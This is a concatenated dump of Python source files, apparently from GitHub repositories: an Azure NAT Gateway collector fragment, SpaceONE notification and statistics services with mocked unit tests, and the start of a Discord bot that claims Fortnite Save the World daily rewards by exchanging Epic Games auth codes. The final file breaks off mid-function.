'public_ip_addresses_count': len(nat_gateway_dict['public_ip_addresses'])
})
except Exception as e:
_LOGGER.error(f'[ERROR]: Azure NAT Gateway Manager]: Get Public IP Addresses Count: {e}')
# Get Public IP Address Dictionary
try:
if not nat_gateway_dict['public_ip_addresses']:
break
pip_list = []
for pip in nat_gateway_dict['public_ip_addresses']:
public_ip_prefixes_id = pip['id']
pip_dict = self.get_public_ip_address_dict(self, nat_gateway_conn, public_ip_prefixes_id)
pip_list.append(pip_dict)
nat_gateway_dict['public_ip_addresses'] = pip_list
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Public IP Addresses Dictionary]: {e}')
if nat_gateway_dict.get('public_ip_prefixes') is not None:
try:
nat_gateway_dict.update({
'public_ip_prefixes_count': len(nat_gateway_dict['public_ip_addresses'])
})
except Exception as e:
_LOGGER.debug(f'[ERROR: Azure NAT Gateway Manager Get Public IP Prefixes Count]: {e}')
# Get Public IP Address Dictionary
try:
if not nat_gateway_dict['public_ip_prefixes']:
break
pip_list = []
for pip in nat_gateway_dict['public_ip_prefixes']:
public_ip_prefixes_id = pip['id']
pip_dict = self.get_public_ip_prefixes_dict(self, nat_gateway_conn, public_ip_prefixes_id)
pip_list.append(pip_dict)
nat_gateway_dict['public_ip_prefixes'] = pip_list
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Public IP Prefixes Dictionary]: {e}')
if nat_gateway_dict.get('subnets') is not None:
try:
nat_gateway_dict.update({
'subnets': self.get_subnets(self, nat_gateway_conn, nat_gateway_dict['subnets'])
})
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Subnet]: {e}')
_LOGGER.debug(f'[NAT GATEWAYS INFO] {nat_gateway_dict}')
nat_gateway_data = NatGateway(nat_gateway_dict, strict=False)
application_gateway_resource = NatGatewayResource({
'data': nat_gateway_data,
'region_code': nat_gateway_data.location,
'reference': ReferenceModel(nat_gateway_data.reference()),
'name': nat_gateway_data.name
})
# Must set_region_code method for region collection
self.set_region_code(nat_gateway_data['location'])
nat_gateways.append(NatGatewayResponse({'resource': application_gateway_resource}))
_LOGGER.debug(f'** NAT Gateway Finished {time.time() - start_time} Seconds **')
return nat_gateways
@staticmethod
def get_public_ip_address_dict(self, nat_gateway_conn, pip_id):
try:
pip_name = pip_id.split('/')[8]
resource_group_name = pip_id.split('/')[4]
pip_obj = nat_gateway_conn.get_public_ip_addresses(resource_group_name=resource_group_name, public_ip_address_name=pip_name)
pip_dict = self.convert_nested_dictionary(self, pip_obj)
return pip_dict
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Public IP Addresses Dictionary]: {e}')
@staticmethod
def get_public_ip_prefixes_dict(self, nat_gateway_conn, pip_id):
try:
pip_name = pip_id.split('/')[8]
resource_group_name = pip_id.split('/')[4]
pip_obj = nat_gateway_conn.get_public_ip_prefixes(resource_group_name=resource_group_name, public_ip_prefixes_name=pip_name)
pip_dict = self.convert_nested_dictionary(self, pip_obj)
return pip_dict
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Public IP Prefixes Dictionary]: {e}')
@staticmethod
def get_subnets(self, nat_gateway_conn, subnets):
subnet_list = []
try:
for subnet in subnets:
resource_group_name = subnet['id'].split('/')[4]
subnet_name = subnet['id'].split('/')[10]
vnet_name = subnet['id'].split('/')[8]
subnet_obj = nat_gateway_conn.get_subnet(resource_group_name=resource_group_name, subnet_name=subnet_name, vnet_name=vnet_name)
subnet_dict = self.convert_nested_dictionary(self, subnet_obj)
subnet_dict.update({
'virtual_network': vnet_name
})
subnet_list.append(subnet_dict)
return subnet_list
except Exception as e:
_LOGGER.error(f'[ERROR: Azure NAT Gateway Manager Get Subnets]: {e}')
```
|
{
"source": "jean1042/plugin-telegram-notification-protocol",
"score": 2
}
|
#### File: api/plugin/protocol.py
```python
from spaceone.api.notification.plugin import protocol_pb2_grpc, protocol_pb2
from spaceone.core.pygrpc import BaseAPI
from spaceone.core.pygrpc.message_type import *
from spaceone.notification.service import ProtocolService
class Protocol(BaseAPI, protocol_pb2_grpc.ProtocolServicer):
pb2 = protocol_pb2
pb2_grpc = protocol_pb2_grpc
def init(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('ProtocolService', metadata) as protocol_svc:
plugin_info = protocol_svc.init(params)
return self.locator.get_info('PluginInfo', plugin_info)
def verify(self, request, context):
params, metadata = self.parse_request(request, context)
collector_svc: ProtocolService = self.locator.get_service('ProtocolService', metadata)
with collector_svc:
collector_svc.verify(params)
return self.locator.get_info('EmptyInfo')
```
#### File: notification/manager/notification_manager.py
```python
from spaceone.core.manager import BaseManager
from spaceone.notification.manager.telegram_manager import TelegramManager
class NotificationManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def dispatch(self, token, chat_id, message, **kwargs):
telegram_mgr: TelegramManager = self.locator.get_manager('TelegramManager')
telegram_mgr.set_connector(token)
telegram_mgr.send_message(chat_id=chat_id, message=message, **kwargs)
```
|
{
"source": "jean1042/statistics",
"score": 2
}
|
#### File: statistics/manager/history_manager.py
```python
import logging
from datetime import datetime
from spaceone.core.manager import BaseManager
from spaceone.statistics.model.history_model import History
_LOGGER = logging.getLogger(__name__)
class HistoryManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.history_model: History = self.locator.get_model('History')
def create_history(self, schedule_vo, topic, results, domain_id):
def _rollback(history_vo):
_LOGGER.info(f'[create_history._rollback] '
f'Delete history : {history_vo.topic}')
history_vo.deregister()
created_at = datetime.utcnow()
for values in results:
history_data = {
'topic': topic,
'schedule': schedule_vo,
'values': values,
'created_at': created_at,
'domain_id': domain_id
}
_LOGGER.debug(f'[create_history] create history: {history_data}')
history_vo: History = self.history_model.create(history_data)
self.transaction.add_rollback(_rollback, history_vo)
def list_history(self, query={}):
return self.history_model.query(**query)
def stat_history(self, query):
return self.history_model.stat(**query)
```
#### File: statistics/service/schedule_service.py
```python
import logging
import copy
from spaceone.core.service import *
from spaceone.core import utils
from spaceone.statistics.error import *
from spaceone.statistics.manager.resource_manager import ResourceManager
from spaceone.statistics.manager.schedule_manager import ScheduleManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class ScheduleService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource_mgr: ResourceManager = self.locator.get_manager('ResourceManager')
self.schedule_mgr: ScheduleManager = self.locator.get_manager('ScheduleManager')
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['topic', 'options', 'schedule', 'domain_id', 'user_id'])
def add(self, params):
"""Add schedule for statistics
Args:
params (dict): {
'topic': 'str',
'options': 'dict',
'schedule': 'dict',
'tags': 'dict',
'domain_id': 'str',
'user_id': 'str'
}
Returns:
schedule_vo
"""
domain_id = params['domain_id']
options = copy.deepcopy(params['options'])
schedule = params['schedule']
user_id = params['user_id']
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
self._check_schedule(schedule)
self._verify_query_option(options, domain_id)
return self.schedule_mgr.add_schedule(params)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def update(self, params):
"""Update schedule
Args:
params (dict): {
'schedule_id': 'str',
'schedule': 'dict',
'tags': 'dict',
'domain_id': 'str'
}
Returns:
schedule_vo
"""
schedule = params.get('schedule')
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
self._check_schedule(schedule)
return self.schedule_mgr.update_schedule(params)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def enable(self, params):
"""Enable schedule
Args:
params (dict): {
'schedule_id': 'str',
'domain_id': 'str'
}
Returns:
schedule_vo
"""
domain_id = params['domain_id']
schedule_id = params['schedule_id']
schedule_vo = self.schedule_mgr.get_schedule(schedule_id, domain_id)
return self.schedule_mgr.update_schedule_by_vo({'state': 'ENABLED'}, schedule_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def disable(self, params):
"""Disable schedule
Args:
params (dict): {
'schedule_id': 'str',
'domain_id': 'str'
}
Returns:
schedule_vo
"""
domain_id = params['domain_id']
schedule_id = params['schedule_id']
schedule_vo = self.schedule_mgr.get_schedule(schedule_id, domain_id)
return self.schedule_mgr.update_schedule_by_vo({'state': 'DISABLED'}, schedule_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def delete(self, params):
"""Delete schedule
Args:
params (dict): {
'schedule_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.schedule_mgr.delete_schedule(params['schedule_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['schedule_id', 'domain_id'])
def get(self, params):
"""Get schedule
Args:
params (dict): {
'schedule_id': 'str',
'domain_id': 'str',
'only': 'list'
}
Returns:
schedule_vo
"""
return self.schedule_mgr.get_schedule(params['schedule_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['domain_id'])
@append_query_filter(['schedule_id', 'topic', 'state', 'data_source_id', 'resource_type', 'domain_id'])
@change_tag_filter('tags')
@append_keyword_filter(['schedule_id', 'topic', 'resource_type'])
def list(self, params):
""" List schedules
Args:
params (dict): {
'schedule_id': 'str',
'topic': 'str',
'state': 'str',
'data_source_id': 'str',
'resource_type': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)'
}
Returns:
schedule_vos (object)
total_count
"""
query = params.get('query', {})
return self.schedule_mgr.list_schedules(query)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id'])
@change_tag_filter('tags')
@append_keyword_filter(['schedule_id', 'topic', 'resource_type'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)'
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.schedule_mgr.stat_schedules(query)
@transaction
@append_query_filter([])
def list_domains(self, params):
""" This is used by Scheduler
Returns:
results (list)
total_count (int)
"""
mgr = self.locator.get_manager('ScheduleManager')
query = params.get('query', {})
result = mgr.list_domains(query)
return result
@staticmethod
def _check_schedule(schedule):
if schedule and len(schedule) > 1:
raise ERROR_SCHEDULE_OPTION()
def _verify_query_option(self, options, domain_id):
aggregate = options.get('aggregate', [])
page = options.get('page', {})
self.resource_mgr.stat(aggregate, page, domain_id)
```
#### File: test/api/test_storage_api.py
```python
import unittest
import copy
import os
from unittest.mock import patch
from mongoengine import connect, disconnect
from google.protobuf.json_format import MessageToDict
from google.protobuf.empty_pb2 import Empty
from spaceone.core.unittest.result import print_message
from spaceone.core.unittest.runner import RichTestRunner
from spaceone.core import config
from spaceone.core import utils
from spaceone.core.service import BaseService
from spaceone.core.locator import Locator
from spaceone.core.pygrpc import BaseAPI
from spaceone.api.statistics.v1 import storage_pb2
from spaceone.statistics.api.v1.storage import Storage
from test.factory.storage_factory import StorageFactory
from spaceone.statistics.connector import PluginConnector
from spaceone.core.model.mongo_model import MongoModel
class _MockStorageService(BaseService):
'''
def add(self, params):
params = copy.deepcopy(params)
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
return ScheduleFactory(**params)
def update(self, params):
params = copy.deepcopy(params)
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
return ScheduleFactory(**params)
def delete(self, params):
pass
def enable(self, params):
return ScheduleFactory(**params)
def disable(self, params):
return ScheduleFactory(**params)
def get(self, params):
return ScheduleFactory(**params)
def list(self, params):
return ScheduleFactory.build_batch(10, **params), 10
def stat(self, params):
return {
'results': [{'project_id': utils.generate_id('project'), 'server_count': 100}]
}
'''
def get(self, params):
params = copy.deepcopy(params)
return StorageFactory(**params)
def register(self, params):
return StorageFactory(**params)
def update(self, params):
params = copy.deepcopy(params)
return StorageFactory(**params)
def list(self, params):
return StorageFactory.build_batch(10, **params), 10
def enable(self, params):
return StorageFactory(**params)
def disable(self, params):
return StorageFactory(**params)
def deregister(self, params):
return StorageFactory(**params)
def update_plugin(self, params):
return StorageFactory(**params)
def verify_plugin(self, params):
return StorageFactory(**params)
class TestStorageAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
config.init_conf(package='spaceone.statistics')
connect('test', host='mongomock://localhost')
config_path = os.environ.get('SPACEONE_CONFIG_FILE')
super().setUpClass()
@classmethod
def tearDownClass(cls) -> None:
super().tearDownClass()
disconnect()
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_register_storage(self, mock_parse_request, *args):
params = {
'name': utils.generate_id('storage', 4),
'tags': {
utils.random_string(5): utils.random_string(5)
},
'plugin_info': {
'plugin_id': utils.generate_id('plugin'),
'version': '1.1',
'secret_id': utils.generate_id('secret')
},
'user_id': utils.generate_id('user'),
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.register(params, {})
print_message(storage_info, 'test_register_storage')
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_info.name, params['name'])
self.assertEqual(storage_data['state'], 'ENABLED')
# self.assertIsNotNone(storage_info.capability)
self.assertDictEqual(storage_data['tags'], params['tags'])
self.assertIsInstance(storage_info.plugin_info, storage_pb2.PluginInfo) # Check if 'PluginInfo' exists
self.assertEqual(storage_data['plugin_info']['plugin_id'], params['plugin_info']['plugin_id'])
self.assertEqual(storage_data['plugin_info']['version'], params['plugin_info']['version'])
self.assertEqual(storage_data['domain_id'], params['domain_id'])
self.assertIsNotNone(getattr(storage_info, 'created_at', None))
print(f'[TEST REGISTER STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_update_storage(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'name': 'update-storage-name',
'tags': {
'update_key': 'update_value'
},
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.update(params, {})
print_message(storage_info, 'test_update_schedule')
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_data['name'], params['name'])
self.assertEqual(storage_data['storage_id'], params['storage_id'])
self.assertDictEqual(storage_data['tags'], params['tags'])
print(f'[TEST UPDATE STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_get_storage(self, mock_parse_request, *args):
mock_parse_request.return_value = ({}, {})
params = {
'domain_id': utils.generate_id('domain'),
'storage_id': utils.generate_id('storage')
}
storage_servicer = Storage()
storage_info = storage_servicer.get(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_get_schedule')
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
print(f'[TEST GET STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_list_schedules(self, mock_parse_request, *args):
mock_parse_request.return_value = ({}, {})
storage_servicer = Storage()
schedules_info = storage_servicer.list({}, {})
print_message(schedules_info, 'test_list_schedules')
self.assertIsInstance(schedules_info, storage_pb2.StoragesInfo)
self.assertIsInstance(schedules_info.results[0], storage_pb2.StorageInfo)
self.assertEqual(schedules_info.total_count, 10)
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_enable_storage(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'state': 'ENABLED',
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.enable(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_enable_storage')
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_info.state, storage_pb2.StorageInfo.State.ENABLED)
print(f'[TEST ENABLE STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_disable_storage(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'state': 'DISABLED',
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.disable(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_disable_storage')
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_info.state, storage_pb2.StorageInfo.State.DISABLED)
print(f'[TEST DISABLE STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(BaseAPI, 'parse_request')
def test_deregister_storage(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.deregister(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_deregister_storage')
# TODO : ASK!!
# self.assertIsInstance(storage_info, Empty)
# self.assertEqual(storage_info.state, storage_pb2.StorageInfo.State.DISABLED)
print(f'[TEST DEREGISTER STORAGE] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(PluginConnector, '__init__', return_value=None)
@patch.object(PluginConnector, 'initialize', return_value='grpc://plugin.spaceone.dev:50051')
@patch.object(PluginConnector, 'get_plugin_endpoint', return_value='grpc://plugin.spaceone.dev:50051')
@patch.object(BaseAPI, 'parse_request')
def test_update_plugin(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'name': 'storage-plugin-update',
'plugin_info': {
'plugin_id': utils.generate_id('storage'),
'version': '3.0',
'options': {},
},
'tags': {
'update_key': 'update_value'
},
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.update_plugin(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_update_storage_plugin')
self.assertIsInstance(storage_info, storage_pb2.StorageInfo)
self.assertEqual(storage_info.name, params['name'])
self.assertDictEqual(storage_data['tags'], params['tags'])
self.assertEqual(storage_info.plugin_info.version, params['plugin_info']['version'])
self.assertIsNotNone(storage_info.plugin_info)
print(f'[TEST UPDATE STORAGE PLUGIN] {storage_data}')
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockStorageService())
@patch.object(PluginConnector, '__init__', return_value=None)
@patch.object(PluginConnector, 'initialize', return_value='grpc://plugin.spaceone.dev:50051')
@patch.object(PluginConnector, 'get_plugin_endpoint', return_value='grpc://plugin.spaceone.dev:50051')
@patch.object(BaseAPI, 'parse_request')
def test_verify_plugin(self, mock_parse_request, *args):
params = {
'storage_id': utils.generate_id('storage'),
'domain_id': utils.generate_id('domain')
}
mock_parse_request.return_value = (params, {})
storage_servicer = Storage()
storage_info = storage_servicer.verify_plugin(params, {})
storage_data = MessageToDict(storage_info, preserving_proto_field_name=True)
print_message(storage_info, 'test_deregister_storage_plugin')
self.assertIsInstance(storage_info, Empty)
print(f'[TEST VERIFY STORAGE PLUGIN] {storage_data}')
if __name__ == "__main__":
unittest.main(testRunner=RichTestRunner)
```
|
{
"source": "jean1398reborn/stw-daily",
"score": 2
}
|
#### File: jean1398reborn/stw-daily/Save the World Daily.py
```python
import asyncio
import datetime
import json
# noinspection PyUnresolvedReferences
import os
import time
import random
import discord
import discord.member
import psutil
import requests
from discord.ext import commands
import items
from discord_slash import SlashCommand
from discord_slash.utils.manage_commands import create_option, create_choice
# ur function is broken its only guaranteed for 2020
# :o your right..
def mixedCase(*args):
"""
Generates a completely random number
Guaranteed to be random 100% **WORKING 2020** FREE HD 4k
"""
total = []
import itertools
for string in args:
a = map(''.join, itertools.product(*((c.upper(), c.lower()) for c in string)))
for x in list(a): total.append(x)
return list(total)
client = commands.AutoShardedBot(case_insensetive=True, command_prefix=mixedCase('stw '))
client.remove_command('help')
slash = SlashCommand(client, sync_commands=True)
uptime_start = datetime.datetime.utcnow()
daily_feedback = ""
r = ''
guild_ids = None
amount2 = ''
rewards = ''
errorList = ["That wasn't supposed to happen", "Whoops!", "We hit a roadblock", "Not the llama you're looking for",
"Uh-oh! Something goofed"]
tipsList = [
"You can [refresh the final page](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code) to get a new code (if you're signed in)",
"Follow [@STW_Daily](https://twitter.com/STW_Daily) on Twitter for the latest updates in your timeline",
"Found a problem? [Join the support server](https://discord.gg/MtSgUu)",
"Found problems with the translation feature? [Join the support server](https://discord.gg/MtSgUu) and let us know!", "You are epic! Keep doing you! ❤"]
class endpoints:
ac = "https://www.epicgames.com/id/logout?redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin%3FredirectUrl%3Dhttps%253A%252F%252Fwww.epicgames.com%252Fid%252Fapi%252Fredirect%253FclientId%253Dec684b8c687f479fadea3cb2ad83f5c6%2526responseType%253Dcode"
token = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/token"
reward = "https://fortnite-public-service-prod11.ol.epicgames.com/fortnite/api/game/v2/profile/{0}/client/ClaimLoginReward?profileId=campaign"
def lastmfunction():
try:
# put path to ur py file here if u want the most useless functionality
lastm = datetime.datetime.utcfromtimestamp(os.path.getmtime(r'/app/stw-daily-heroku.py')).strftime(
'%I:%M %p - %d/%m/%Y')
except:
lastm = 'Not available'
return lastm
# noinspection PyUnboundLocalVariable,PyShadowingNames
def getToken(authCode: str):
h = {
"Content-Type": "application/x-www-form-urlencoded",
"Authorization": "basic ZWM2ODRiOGM2ODdmNDc5ZmFkZWEzY2IyYWQ4M2Y1YzY6ZTFmMzFjMjExZjI4NDEzMTg2MjYyZDM3YTEzZmM4NGQ="
}
d = {
"grant_type": "authorization_code",
"code": authCode
}
r = requests.post(endpoints.token, headers=h, data=d)
# print(r.text)
r = json.loads(r.text)
if "access_token" in r:
access_token = r["access_token"]
account_id = r["account_id"]
# print(f"access_token: {access_token}\naccount_id: {account_id}\nexpires_at: {r['expires_at']}")
return access_token, account_id
else:
if "errorCode" in r:
# print(r)
print(f"[ERROR] {r['errorCode']}")
err = r['errorCode']
reason = r['errorMessage']
else:
print("[ERROR] Unknown error")
return False, err, reason
def get_bot_uptime():
now = datetime.datetime.utcnow()
delta = now - uptime_start
hours, remainder = divmod(int(delta.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
fmt = '{d} days, {h} hours, {m} minutes, and {s} seconds'
return fmt.format(d=days, h=hours, m=minutes, s=seconds)
def time_until_end_of_day():
tomorrow = datetime.datetime.utcnow() + datetime.timedelta(days=1)
a = datetime.datetime.combine(tomorrow, datetime.time.min) - datetime.datetime.utcnow()
hours, remainder = divmod(int(a.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
fmt = ''
if hours == 1:
fmt += '{h} hour, '
else:
fmt += '{h} hours, '
if minutes == 1:
fmt += '{m} minute'
else:
fmt += '{m} minutes'
return fmt.format(h=hours, m=minutes)
# print(fmt.format(h=hours, m=minutes))
@client.event
async def on_ready():
print('Client open')
await client.change_presence(
activity=discord.Activity(type=discord.ActivityType.listening,
name=f"stw help | Reset in: \n{time_until_end_of_day()}\n | In {len(client.guilds)} guilds"))
async def update_status():
await client.wait_until_ready()
while True:
await client.change_presence(
activity=discord.Activity(type=discord.ActivityType.listening,
name=f"stw help | Reset in: \n{time_until_end_of_day()}\n | In {len(client.guilds)} guilds"))
await asyncio.sleep(60)
# noinspection PyBroadException
async def info_command(message):
try:
osgetlogin = os.getlogin()
except:
osgetlogin = 'Not Available'
embed = discord.Embed(title='Information', description='Statistics:', colour=discord.Colour.red())
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/695117839383920641/759372935676559400/Asset_4.14x.png')
embed.set_author(name=message.author.name, icon_url=message.author.avatar_url)
embed.add_field(name='Host statistics:', value=f'os.name: {os.name}\nos.cpu_count: {os.cpu_count()}\n'
f'os.getcwd: {os.getcwd()}\nos.getlogin: {osgetlogin}\n'
f'CPU usage: {psutil.cpu_percent()}%\n'
f'CPU Freq: {int(psutil.cpu_freq().current)}mhz\nRAM Usage:\nTotal: '
f'{psutil.virtual_memory().total // 1000000}mb\nUsed: '
f'{psutil.virtual_memory().used // 1000000}mb\nFree: '
f'{psutil.virtual_memory().free // 1000000}mb\nUtilisation: '
f'{psutil.virtual_memory().percent}%')
embed.add_field(name='Bot statistics:', value=f'Last update at: {lastmfunction()}')
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
await message.send(embed=embed)
@client.command(name='inf',
aliases=mixedCase('info') + ['infomation', 'stats', 'statistics'],
description='Used to see stats and info about the bot hosting service')
async def info(ctx):
await info_command(ctx)
@slash.slash(name='info',
description='Used to see stats and info about the bot hosting service',
guild_ids=guild_ids)
async def slashinfo(ctx):
await info_command(ctx)
def getReward(day):
day_mod = int(day) % 336
if day_mod == 0:
day_mod = 336
return items.ItemDictonary[str(day_mod)]
async def reward_command(message, day, limit):
global rewards
if day == 'Uhoh-stinky':
await message.send('specify the day (number) of which you would like to see.')
elif not day.isnumeric():
await message.send('specify a number only please. your argument is what day you want to know about.')
else:
embed = discord.Embed(title=f"Reward info", description=f'For day **{day}**', color=discord.Color(0xff00ff))
embed.add_field(name=f'**Item: **', value=f'{getReward(day)}')
for day1 in items.ItemDictonary:
if 'vBucks' in items.ItemDictonary[day1]:
if int(day) % 336 < int(day1):
if int(day1) - int(day) % 336 == 1:
embed.add_field(name=f'**Next vBuck reward in: **',
value=f'**{int(day1) - int(day) % 336}** day.')
else:
embed.add_field(name=f'**Next vBuck reward in: **',
value=f'**{int(day1) - int(day) % 336}** days.')
break
rewards = ''
if limit < 1:
limit = 7
for day2 in range(1, limit):
rewards += getReward(day2 + int(day))
if not (day2 + 1 == limit):
rewards += ', '
else:
rewards += '.'
if limit == 1:
embed.add_field(name=f'**Tomorrow\'s reward:**', value=f'{getReward(int(day) + 1)}', inline=False)
else:
embed.add_field(name=f'Rewards for the next **{limit}** days:', value=f'{rewards}', inline=False)
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
await message.send(embed=embed)
@client.command(name='rwd',
aliases=mixedCase('reward') + ['dayinfo', 'dailyinfo', 'rwrd', 'RWRD'],
description='View info about a specified days reward')
async def reward(ctx, day='Uhoh-stinky', limit=7):
await reward_command(ctx, day, limit)
@slash.slash(name='reward',
description='View info about a specified days reward',
options=[
create_option(name="day",
description="The day of which you would like to see.",
option_type=4,
required=True),
create_option(name="limit",
description="Amount of rewards to view from set day.",
option_type=4,
required=False),
], guild_ids=guild_ids
)
async def slashreward(ctx, day='Uhoh-stinky', limit=7):
await reward_command(ctx, str(day), limit)
# noinspection PyShadowingBuiltins
@client.command(name='helpfullmao', aliases=mixedCase('help') + ['halp', 'holp', 'how', 'hel', 'h', '?', 'helpp', 'huh'], description='Well, this tells you what commands are available.')
async def help(message):
embed = discord.Embed(title='Help', description='Commands:', colour=discord.Colour.red())
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/757803329027047444/Asset_2.24x.1.png')
embed.set_author(name=message.author.name, icon_url=message.author.avatar_url)
embed.add_field(name='**stw daily** [AUTH TOKEN]',
value="Collect your daily reward\n**Requires: Auth Token**\n[You can get an auth token by following this "
"link](https://tinyurl.com/epicauthcode)\nThen just simply copy your code from the response "
"and append to your command.",
inline=False)
embed.add_field(name='**stw instruction**', value='More detailed instructions for using the bot', inline=False)
embed.add_field(name='**stw reward [day] [future day]**',
value='Sends the friendly name of a reward for the given day.')
embed.add_field(name='**stw ping**',
value='Sends the WebSocket latency and actual latency.')
embed.add_field(name='**stw info**', value='Returns information about the bots host')
embed.add_field(name='Want to quickly see some relevant information?',
value='Have a look at the bot playing status')
embed.add_field(name='**Need an invite?**',
value='**Use **`stw invite`** to get a [server invite](https://discord.gg/MtSgUu) and a [bot invite](https://tinyurl.com/stwdailyinvite).**',
inline=False)
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
await message.send(embed=embed)
async def instruction_command(message, arg):
examples = {'norm': 'stw daily a51c1f4d35b1457c8e34a1f6026faa35',
'slash': '/daily a51c1f4d35b1457c8e34a1f6026faa35'
}
embed = discord.Embed(title='How to use "STW Daily"', color=discord.Color.blurple())
embed.set_footer(text='This bot was made by Dippy is not here', icon_url=message.author.avatar_url)
embed.add_field(name='Welcome',
